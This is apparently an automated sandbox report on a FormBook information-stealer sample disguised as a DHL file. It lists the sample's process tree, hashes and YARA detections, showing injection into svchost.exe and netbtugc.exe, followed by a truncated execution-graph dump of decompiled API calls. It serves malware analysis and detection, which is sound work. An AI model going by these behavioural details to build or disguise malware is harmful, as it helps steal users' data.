                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:00:41:01
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Users\user\Desktop\DHL 073412182024.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\DHL 073412182024.exe"
                                                                                    Imagebase:0xda0000
                                                                                    File size:1'249'792 bytes
                                                                                    MD5 hash:9AD73BE33F667E2400DAB66BA0C20058
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:00:41:04
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\DHL 073412182024.exe"
                                                                                    Imagebase:0x7a0000
                                                                                    File size:46'504 bytes
                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:00:41:10
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe"
                                                                                    Imagebase:0xb50000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:3
                                                                                    Start time:00:41:11
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                    Imagebase:0x740000
                                                                                    File size:22'016 bytes
                                                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:7
                                                                                    Start time:00:41:36
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff6bf500000
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.1%
                                                                                      Dynamic/Decrypted Code Coverage:2.2%
                                                                                      Signature Coverage:5.4%
                                                                                      Total number of Nodes:1849
                                                                                      Total number of Limit Nodes:61
                                                                                      execution_graph 95928 da105b 95933 da344d 95928->95933 95930 da106a 95964 dc00a3 29 API calls __onexit 95930->95964 95932 da1074 95934 da345d __wsopen_s 95933->95934 95965 daa961 95934->95965 95938 da351c 95977 da3357 95938->95977 95945 daa961 22 API calls 95946 da354d 95945->95946 95998 daa6c3 95946->95998 95949 de3176 RegQueryValueExW 95950 de320c RegCloseKey 95949->95950 95951 de3193 95949->95951 95954 da3578 95950->95954 95963 de321e _wcslen 95950->95963 96004 dbfe0b 95951->96004 95953 de31ac 96014 da5722 95953->96014 95954->95930 95957 da4c6d 22 API calls 95957->95963 95958 de31d4 96017 da6b57 95958->96017 95960 de31ee messages 95960->95950 95962 da515f 22 API calls 95962->95963 95963->95954 95963->95957 95963->95962 96029 da9cb3 95963->96029 95964->95932 95966 dbfe0b 22 API calls 95965->95966 95967 daa976 95966->95967 96035 dbfddb 95967->96035 95969 da3513 95970 da3a5a 95969->95970 96057 de1f50 95970->96057 95973 da9cb3 22 API calls 95974 da3a8d 95973->95974 96059 da3aa2 95974->96059 95976 da3a97 95976->95938 95978 de1f50 __wsopen_s 95977->95978 95979 da3364 GetFullPathNameW 95978->95979 95980 da3386 95979->95980 95981 da6b57 22 API calls 95980->95981 95982 da33a4 95981->95982 95983 da33c6 95982->95983 95984 de30bb 95983->95984 95985 da33dd 95983->95985 95987 dbfddb 22 API calls 95984->95987 96083 da33ee 95985->96083 95989 de30c5 _wcslen 95987->95989 95988 da33e8 95992 da515f 95988->95992 95990 dbfe0b 22 API calls 95989->95990 95991 de30fe __fread_nolock 95990->95991 95993 da516e 95992->95993 95997 da518f __fread_nolock 95992->95997 95995 dbfe0b 22 API calls 95993->95995 95994 dbfddb 22 API calls 95996 da3544 95994->95996 95995->95997 95996->95945 95997->95994 95999 daa6dd 95998->95999 96000 da3556 RegOpenKeyExW 95998->96000 96001 dbfddb 22 API calls 95999->96001 96000->95949 96000->95954 96002 daa6e7 96001->96002 96003 dbfe0b 22 API calls 96002->96003 96003->96000 96007 dbfddb 96004->96007 96005 dcea0c ___std_exception_copy 21 API calls 96005->96007 96006 dbfdfa 96006->95953 96007->96005 96007->96006 96010 dbfdfc 96007->96010 96098 dc4ead 7 API calls 2 library calls 96007->96098 96009 dc066d 96100 dc32a4 RaiseException 96009->96100 96010->96009 96099 dc32a4 RaiseException 96010->96099 96013 dc068a 96013->95953 96015 dbfddb 22 API calls 96014->96015 96016 da5734 RegQueryValueExW 96015->96016 96016->95958 96016->95960 96018 da6b67 _wcslen 96017->96018 96019 de4ba1 96017->96019 96022 da6b7d 96018->96022 96023 da6ba2 96018->96023 96020 da93b2 22 API calls 96019->96020 96021 de4baa 96020->96021 96021->96021 96101 da6f34 96022->96101 96025 dbfddb 22 API calls 96023->96025 96027 da6bae 96025->96027 96026 da6b85 __fread_nolock 96026->95960 96028 dbfe0b 22 API calls 96027->96028 96028->96026 96030 da9cc2 _wcslen 96029->96030 96031 dbfe0b 22 API calls 96030->96031 96032 da9cea __fread_nolock 96031->96032 96033 dbfddb 22 API calls 96032->96033 96034 da9d00 96033->96034 96034->95963 96038 dbfde0 96035->96038 96037 dbfdfa 96037->95969 96038->96037 96041 dbfdfc 96038->96041 96045 dcea0c 96038->96045 96052 dc4ead 7 API calls 2 library calls 96038->96052 96040 dc066d 96054 dc32a4 RaiseException 96040->96054 96041->96040 96053 dc32a4 RaiseException 96041->96053 96044 dc068a 96044->95969 96050 dd3820 __dosmaperr 96045->96050 96046 dd385e 96056 dcf2d9 20 API calls __dosmaperr 96046->96056 96047 dd3849 RtlAllocateHeap 96049 dd385c 96047->96049 96047->96050 96049->96038 96050->96046 96050->96047 96055 dc4ead 7 API calls 2 library calls 96050->96055 96052->96038 96053->96040 96054->96044 96055->96050 96056->96049 96058 da3a67 GetModuleFileNameW 96057->96058 96058->95973 96060 de1f50 __wsopen_s 96059->96060 96061 da3aaf GetFullPathNameW 96060->96061 96062 da3ae9 96061->96062 96063 da3ace 96061->96063 96065 daa6c3 22 API calls 96062->96065 96064 da6b57 22 API calls 96063->96064 96066 da3ada 96064->96066 96065->96066 96069 da37a0 96066->96069 96070 da37ae 96069->96070 96073 da93b2 96070->96073 96072 da37c2 96072->95976 96074 da93c9 __fread_nolock 96073->96074 96075 da93c0 96073->96075 96074->96072 96075->96074 96077 daaec9 96075->96077 96078 daaedc 96077->96078 96082 daaed9 __fread_nolock 96077->96082 96079 dbfddb 22 API calls 96078->96079 96080 daaee7 96079->96080 96081 dbfe0b 22 API calls 96080->96081 96081->96082 96082->96074 96084 da33fe _wcslen 96083->96084 96085 de311d 96084->96085 96086 da3411 96084->96086 96088 dbfddb 22 API calls 96085->96088 96093 daa587 96086->96093 96090 de3127 96088->96090 96089 da341e __fread_nolock 96089->95988 96091 dbfe0b 22 API calls 96090->96091 96092 de3157 __fread_nolock 96091->96092 96094 daa59d 96093->96094 96097 daa598 __fread_nolock 96093->96097 96095 dbfe0b 22 API calls 96094->96095 96096 def80f 96094->96096 96095->96097 96096->96096 96097->96089 96098->96007 96099->96009 96100->96013 96102 da6f4c 96101->96102 96104 da6f46 96101->96104 96103 dbfe0b 22 API calls 96102->96103 96103->96104 96104->96026 96105 da1098 96110 da42de 96105->96110 96109 da10a7 96111 daa961 22 API calls 96110->96111 96112 da42f5 GetVersionExW 96111->96112 96113 da6b57 22 API calls 96112->96113 96114 da4342 96113->96114 96115 da93b2 22 API calls 96114->96115 96124 da4378 96114->96124 96116 da436c 96115->96116 96118 da37a0 22 API calls 96116->96118 96117 da441b GetCurrentProcess IsWow64Process 96119 da4437 96117->96119 96118->96124 96120 da444f LoadLibraryA 96119->96120 96121 de3824 GetSystemInfo 96119->96121 96122 da449c GetSystemInfo 96120->96122 96123 da4460 GetProcAddress 96120->96123 96127 da4476 96122->96127 96123->96122 96126 da4470 GetNativeSystemInfo 96123->96126 96124->96117 96125 de37df 96124->96125 96126->96127 96128 da447a FreeLibrary 96127->96128 96129 da109d 96127->96129 96128->96129 96130 dc00a3 29 API calls __onexit 96129->96130 96130->96109 96131 daf7bf 96132 daf7d3 96131->96132 96133 dafcb6 96131->96133 96134 dafcc2 96132->96134 96136 dbfddb 22 API calls 96132->96136 96226 daaceb 23 API calls messages 96133->96226 96227 daaceb 23 API calls messages 96134->96227 96138 daf7e5 96136->96138 96138->96134 96139 daf83e 96138->96139 96140 dafd3d 96138->96140 96158 daed9d messages 96139->96158 96166 db1310 96139->96166 96228 e11155 22 API calls 96140->96228 96143 dafef7 96150 daa8c7 22 API calls 96143->96150 96143->96158 96146 dbfddb 22 API calls 96164 daec76 messages 96146->96164 96147 df4600 96147->96158 96229 daa8c7 96147->96229 96148 df4b0b 96234 e1359c 82 API calls __wsopen_s 96148->96234 96149 daa8c7 22 API calls 96149->96164 96150->96158 96155 dc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96155->96164 96156 dafbe3 96156->96158 96159 df4bdc 96156->96159 96165 daf3ae messages 96156->96165 96157 daa961 22 API calls 96157->96164 96235 e1359c 82 API calls __wsopen_s 96159->96235 96161 dc00a3 29 API calls pre_c_initialization 96161->96164 96162 df4beb 96236 e1359c 82 API calls __wsopen_s 96162->96236 96163 dc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96163->96164 96164->96143 96164->96146 96164->96147 96164->96148 96164->96149 96164->96155 96164->96156 96164->96157 96164->96158 96164->96161 96164->96162 96164->96163 96164->96165 96224 db01e0 235 API calls 2 library calls 96164->96224 96225 db06a0 41 API calls messages 96164->96225 96165->96158 96233 e1359c 82 API calls __wsopen_s 96165->96233 96167 db17b0 96166->96167 96168 db1376 96166->96168 96389 dc0242 5 API calls __Init_thread_wait 96167->96389 96169 db1390 96168->96169 96170 df6331 96168->96170 96237 db1940 96169->96237 96173 df633d 96170->96173 96394 e2709c 235 API calls 96170->96394 96173->96164 96175 db17ba 96177 db17fb 96175->96177 96178 da9cb3 22 API calls 96175->96178 96181 df6346 96177->96181 96183 db182c 96177->96183 96186 db17d4 96178->96186 96179 db1940 9 API calls 96180 db13b6 96179->96180 96180->96177 96182 db13ec 96180->96182 96395 e1359c 82 API calls __wsopen_s 96181->96395 96182->96181 96207 db1408 __fread_nolock 96182->96207 96391 daaceb 23 API calls messages 96183->96391 96390 dc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96186->96390 96187 df6369 96187->96164 96188 db1839 96392 dbd217 235 API calls 96188->96392 96191 df636e 96396 e1359c 82 API calls __wsopen_s 96191->96396 96192 db152f 96194 db153c 96192->96194 96195 df63d1 96192->96195 96197 db1940 9 API calls 96194->96197 96398 e25745 54 API calls _wcslen 96195->96398 96198 db1549 96197->96198 96202 df64fa 96198->96202 96204 db1940 9 API calls 96198->96204 96199 dbfddb 22 API calls 96199->96207 96200 db1872 96393 dbfaeb 23 API calls 96200->96393 96201 dbfe0b 22 API calls 96201->96207 96202->96187 96399 e1359c 82 API calls __wsopen_s 96202->96399 96208 db1563 96204->96208 96207->96187 96207->96188 96207->96191 96207->96192 96207->96199 96207->96201 96209 df63b2 96207->96209 96247 daec40 96207->96247 96208->96202 96211 daa8c7 22 API calls 96208->96211 96213 db15c7 messages 96208->96213 96397 e1359c 82 API calls __wsopen_s 96209->96397 96211->96213 96212 db1940 9 API calls 96212->96213 96213->96187 96213->96200 96213->96202 96213->96212 96215 db167b messages 96213->96215 96271 da4f39 96213->96271 96277 e1f0ec 96213->96277 96286 e2958b 96213->96286 96289 e0d4ce 96213->96289 96292 e2959f 96213->96292 96295 e16ef1 96213->96295 96375 e2e505 96213->96375 96214 db171d 96214->96164 96215->96214 96388 dbce17 22 API calls messages 96215->96388 96224->96164 96225->96164 96226->96134 96227->96140 96228->96158 96230 daa8ea __fread_nolock 96229->96230 96231 daa8db 96229->96231 96230->96158 96231->96230 96232 dbfe0b 22 API calls 96231->96232 96232->96230 96233->96158 96234->96158 96235->96162 96236->96158 96238 db1981 96237->96238 96239 db195d 96237->96239 96400 dc0242 5 API calls __Init_thread_wait 96238->96400 96246 db13a0 96239->96246 96402 dc0242 5 API calls __Init_thread_wait 96239->96402 96241 db198b 96241->96239 96401 dc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96241->96401 96243 db8727 96243->96246 96403 dc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96243->96403 96246->96179 96264 daec76 messages 96247->96264 96248 dafef7 96255 daa8c7 22 API calls 96248->96255 96263 daed9d messages 96248->96263 96251 dbfddb 22 API calls 96251->96264 96252 df4600 96258 daa8c7 22 API calls 96252->96258 96252->96263 96253 df4b0b 96407 e1359c 82 API calls __wsopen_s 96253->96407 96254 daa8c7 22 API calls 96254->96264 96255->96263 96258->96263 96260 dc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96260->96264 96261 dafbe3 96261->96263 96266 df4bdc 96261->96266 96270 daf3ae messages 96261->96270 96262 daa961 22 API calls 96262->96264 96263->96207 96264->96248 96264->96251 96264->96252 96264->96253 96264->96254 96264->96260 96264->96261 96264->96262 96264->96263 96265 dc00a3 29 API calls pre_c_initialization 96264->96265 96268 df4beb 96264->96268 96269 dc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96264->96269 96264->96270 96404 db01e0 235 API calls 2 library calls 96264->96404 96405 db06a0 41 API calls messages 96264->96405 96265->96264 96408 e1359c 82 API calls __wsopen_s 96266->96408 96409 e1359c 82 API calls __wsopen_s 96268->96409 96269->96264 96270->96263 96406 e1359c 82 API calls __wsopen_s 96270->96406 96272 da4f4a 96271->96272 96273 da4f43 96271->96273 96275 da4f6a FreeLibrary 96272->96275 96276 da4f59 96272->96276 96410 dce678 96273->96410 96275->96276 96276->96213 96675 da7510 96277->96675 96281 e1f136 96282 e1f15b 96281->96282 96283 daec40 235 API calls 96281->96283 96285 e1f15f 96282->96285 96726 da9c6e 22 API calls 96282->96726 96283->96282 96285->96213 96751 e27f59 96286->96751 96288 e2959b 96288->96213 96856 e0dbbe lstrlenW 96289->96856 96293 e27f59 120 API calls 96292->96293 96294 e295af 96293->96294 96294->96213 96296 daa961 22 API calls 96295->96296 96297 e16f1d 96296->96297 96298 daa961 22 API calls 96297->96298 96299 e16f26 96298->96299 96300 e16f3a 96299->96300 97046 dab567 96299->97046 96302 da7510 53 API calls 96300->96302 96308 e16f57 _wcslen 96302->96308 96303 e16fbc 96306 da7510 53 API calls 96303->96306 96304 e170bf 96861 da4ecb 96304->96861 96309 e16fc8 96306->96309 96308->96303 96308->96304 96317 e170e9 96308->96317 96313 daa8c7 22 API calls 96309->96313 96316 e16fdb 96309->96316 96310 e170e5 96312 daa961 22 API calls 96310->96312 96310->96317 96311 da4ecb 94 API calls 96311->96310 96314 e1711a 96312->96314 96313->96316 96318 daa961 22 API calls 96314->96318 96315 e17027 96320 da7510 53 API calls 96315->96320 96316->96315 96319 e17005 96316->96319 96322 daa8c7 22 API calls 96316->96322 96317->96213 96321 e17126 96318->96321 96323 da33c6 22 API calls 96319->96323 96324 e17034 96320->96324 96325 daa961 22 API calls 96321->96325 96322->96319 96327 e1700f 96323->96327 96328 e17047 96324->96328 96329 e1703d 96324->96329 96326 e1712f 96325->96326 96331 daa961 22 API calls 96326->96331 96332 da7510 53 API calls 96327->96332 97051 e0e199 GetFileAttributesW 96328->97051 96333 daa8c7 22 API calls 96329->96333 96335 e17138 96331->96335 96336 e1701b 96332->96336 96333->96328 96334 e17050 96337 e17063 96334->96337 96340 da4c6d 22 API calls 96334->96340 96338 da7510 53 API calls 96335->96338 96339 da6350 22 API calls 96336->96339 96342 da7510 53 API calls 96337->96342 96348 e17069 96337->96348 96341 e17145 96338->96341 96339->96315 96340->96337 96883 da525f 96341->96883 96344 e170a0 96342->96344 97052 e0d076 57 API calls 96344->97052 96345 e17166 96925 da4c6d 96345->96925 96348->96317 96350 e171a9 96351 daa8c7 22 API calls 96350->96351 96353 e171ba 96351->96353 96352 da4c6d 22 API calls 96354 e17186 96352->96354 96928 da6350 96353->96928 96354->96350 96357 da6b57 22 API calls 96354->96357 96359 e1719b 96357->96359 96358 da6350 22 API calls 96360 e171d6 96358->96360 96361 da6b57 22 API calls 96359->96361 96362 da6350 22 API calls 96360->96362 96361->96350 96363 e171e4 96362->96363 96364 da7510 53 API calls 96363->96364 96365 e171f0 96364->96365 96937 e0d7bc 96365->96937 96367 e17201 96368 e0d4ce 4 API calls 96367->96368 96369 e1720b 96368->96369 96370 e17239 96369->96370 96371 da7510 53 API calls 96369->96371 96374 da4f39 68 API calls 96370->96374 96372 e17229 96371->96372 96991 e12947 96372->96991 96374->96317 96376 da7510 53 API calls 96375->96376 96377 e2e51d 96376->96377 96378 daa961 22 API calls 96377->96378 96379 e2e52b 96378->96379 96380 dab567 39 API calls 96379->96380 96381 e2e536 96380->96381 96382 e2e560 96381->96382 96384 da7510 53 API calls 96381->96384 97306 da62b5 22 API calls 96382->97306 96386 e2e551 96384->96386 96385 e2e56c 96385->96213 96387 da6d25 22 API calls 96386->96387 96387->96382 96388->96215 96389->96175 96390->96177 96391->96188 96392->96200 96393->96200 96394->96173 96395->96187 96396->96187 96397->96187 96398->96208 96399->96187 96400->96241 96401->96239 96402->96243 96403->96246 96404->96264 96405->96264 96406->96263 96407->96263 96408->96268 96409->96263 96411 dce684 __FrameHandler3::FrameUnwindToState 96410->96411 96412 dce6aa 96411->96412 96413 dce695 96411->96413 96420 dce6a5 __wsopen_s 96412->96420 96423 dc918d EnterCriticalSection 96412->96423 96440 dcf2d9 20 API calls __dosmaperr 96413->96440 96416 dce69a 96441 dd27ec 26 API calls pre_c_initialization 96416->96441 96417 dce6c6 96424 dce602 96417->96424 96420->96272 96421 dce6d1 96442 dce6ee LeaveCriticalSection __fread_nolock 96421->96442 96423->96417 96425 dce60f 96424->96425 96426 dce624 96424->96426 96475 dcf2d9 20 API calls __dosmaperr 96425->96475 96432 dce61f 96426->96432 96443 dcdc0b 96426->96443 96428 dce614 96476 dd27ec 26 API calls pre_c_initialization 96428->96476 96432->96421 96436 dce646 96460 dd862f 96436->96460 96440->96416 96441->96420 96442->96420 96444 dcdc1f 96443->96444 96445 dcdc23 96443->96445 96449 dd4d7a 96444->96449 96445->96444 96446 dcd955 __fread_nolock 26 API calls 96445->96446 96447 dcdc43 96446->96447 96483 dd59be 96447->96483 96450 dce640 96449->96450 96451 dd4d90 96449->96451 96453 dcd955 96450->96453 96451->96450 96452 dd29c8 _free 20 API calls 96451->96452 96452->96450 96454 dcd976 96453->96454 96455 dcd961 96453->96455 96454->96436 96615 dcf2d9 20 API calls __dosmaperr 96455->96615 96457 dcd966 96616 dd27ec 26 API calls pre_c_initialization 96457->96616 96459 dcd971 96459->96436 96461 dd863e 96460->96461 96462 dd8653 96460->96462 96620 dcf2c6 20 API calls __dosmaperr 96461->96620 96464 dd868e 96462->96464 96469 dd867a 96462->96469 96622 dcf2c6 20 API calls __dosmaperr 96464->96622 96466 dd8643 96621 dcf2d9 20 API calls __dosmaperr 96466->96621 96467 dd8693 96623 dcf2d9 20 API calls __dosmaperr 96467->96623 96617 dd8607 96469->96617 96472 dce64c 96472->96432 96477 dd29c8 96472->96477 96473 dd869b 96624 dd27ec 26 API calls pre_c_initialization 96473->96624 96475->96428 96476->96432 96478 dd29d3 RtlFreeHeap 96477->96478 96482 dd29fc __dosmaperr 96477->96482 96479 dd29e8 96478->96479 96478->96482 96674 dcf2d9 20 API calls __dosmaperr 96479->96674 96481 dd29ee GetLastError 96481->96482 96482->96432 96484 dd59ca __FrameHandler3::FrameUnwindToState 96483->96484 96485 dd59d2 96484->96485 96488 dd59ea 96484->96488 96562 dcf2c6 20 API calls __dosmaperr 96485->96562 96487 dd5a88 96567 dcf2c6 20 API calls __dosmaperr 96487->96567 96488->96487 96493 dd5a1f 96488->96493 96489 dd59d7 96563 dcf2d9 20 API calls __dosmaperr 96489->96563 96492 dd5a8d 96568 dcf2d9 20 API calls __dosmaperr 96492->96568 96508 dd5147 EnterCriticalSection 96493->96508 96496 dd5a95 96569 dd27ec 26 API calls pre_c_initialization 96496->96569 96497 dd5a25 96499 dd5a56 96497->96499 96500 dd5a41 96497->96500 96509 dd5aa9 96499->96509 96564 dcf2d9 20 API calls __dosmaperr 96500->96564 96502 dd59df __wsopen_s 96502->96444 96504 dd5a46 96565 dcf2c6 20 API calls __dosmaperr 96504->96565 96505 dd5a51 96566 dd5a80 LeaveCriticalSection __wsopen_s 96505->96566 96508->96497 96510 dd5ad7 96509->96510 96537 dd5ad0 96509->96537 96511 dd5adb 96510->96511 96512 dd5afa 96510->96512 96577 dcf2c6 20 API calls __dosmaperr 96511->96577 96516 dd5b4b 96512->96516 96517 dd5b2e 96512->96517 96515 dd5ae0 96578 dcf2d9 20 API calls __dosmaperr 96515->96578 96520 dd5b61 96516->96520 96583 dd9424 28 API calls __fread_nolock 96516->96583 96580 dcf2c6 20 API calls __dosmaperr 96517->96580 96518 dd5cb1 96518->96505 96570 dd564e 96520->96570 96522 dd5ae7 96579 dd27ec 26 API calls pre_c_initialization 96522->96579 96525 dd5b33 96581 dcf2d9 20 API calls __dosmaperr 96525->96581 96529 dd5b6f 96535 dd5b95 96529->96535 96536 dd5b73 96529->96536 96530 dd5ba8 96533 dd5bbc 96530->96533 96534 dd5c02 WriteFile 96530->96534 96531 dd5b3b 96582 dd27ec 26 API calls pre_c_initialization 96531->96582 96540 dd5bc4 96533->96540 96541 dd5bf2 96533->96541 96538 dd5c25 GetLastError 96534->96538 96543 dd5b8b 96534->96543 96585 dd542e 45 API calls 3 library calls 96535->96585 96542 dd5c69 96536->96542 96584 dd55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96536->96584 96594 dc0a8c 96537->96594 96538->96543 96544 dd5bc9 96540->96544 96545 dd5be2 96540->96545 96588 dd56c4 7 API calls 2 library calls 96541->96588 96542->96537 96592 dcf2d9 20 API calls __dosmaperr 96542->96592 96543->96537 96543->96542 96553 dd5c45 96543->96553 96544->96542 96549 dd5bd2 96544->96549 96587 dd5891 8 API calls 2 library calls 96545->96587 96586 dd57a3 7 API calls 2 library calls 96549->96586 96551 dd5be0 96551->96543 96552 dd5c8e 96593 dcf2c6 20 API calls __dosmaperr 96552->96593 96556 dd5c4c 96553->96556 96557 dd5c60 96553->96557 96589 dcf2d9 20 API calls __dosmaperr 96556->96589 96591 dcf2a3 20 API calls __dosmaperr 96557->96591 96560 dd5c51 96590 dcf2c6 20 API calls __dosmaperr 96560->96590 96562->96489 96563->96502 96564->96504 96565->96505 96566->96502 96567->96492 96568->96496 96569->96502 96601 ddf89b 96570->96601 96572 dd565e 96573 dd5663 96572->96573 96610 dd2d74 38 API calls 3 library calls 96572->96610 96573->96529 96573->96530 96575 dd5686 96575->96573 96576 dd56a4 GetConsoleMode 96575->96576 96576->96573 96577->96515 96578->96522 96579->96537 96580->96525 96581->96531 96582->96537 96583->96520 96584->96543 96585->96543 96586->96551 96587->96551 96588->96551 96589->96560 96590->96537 96591->96537 96592->96552 96593->96537 96595 dc0a95 96594->96595 96596 dc0a97 IsProcessorFeaturePresent 96594->96596 96595->96518 96598 dc0c5d 96596->96598 96614 dc0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96598->96614 96600 dc0d40 96600->96518 96602 ddf8a8 96601->96602 96603 ddf8b5 96601->96603 96611 dcf2d9 20 API calls __dosmaperr 96602->96611 96606 ddf8c1 96603->96606 96612 dcf2d9 20 API calls __dosmaperr 96603->96612 96605 ddf8ad 96605->96572 96606->96572 96608 ddf8e2 96613 dd27ec 26 API calls pre_c_initialization 96608->96613 96610->96575 96611->96605 96612->96608 96613->96605 96614->96600 96615->96457 96616->96459 96625 dd8585 96617->96625 96619 dd862b 96619->96472 96620->96466 96621->96472 96622->96467 96623->96473 96624->96472 96626 dd8591 __FrameHandler3::FrameUnwindToState 96625->96626 96636 dd5147 EnterCriticalSection 96626->96636 96628 dd859f 96629 dd85c6 96628->96629 96630 dd85d1 96628->96630 96637 dd86ae 96629->96637 96652 dcf2d9 20 API calls __dosmaperr 96630->96652 96633 dd85cc 96653 dd85fb LeaveCriticalSection __wsopen_s 96633->96653 96635 dd85ee __wsopen_s 96635->96619 96636->96628 96654 dd53c4 96637->96654 96639 dd86be 96640 dd86c4 96639->96640 96642 dd53c4 __wsopen_s 26 API calls 96639->96642 96651 dd86f6 96639->96651 96667 dd5333 21 API calls 2 library calls 96640->96667 96645 dd86ed 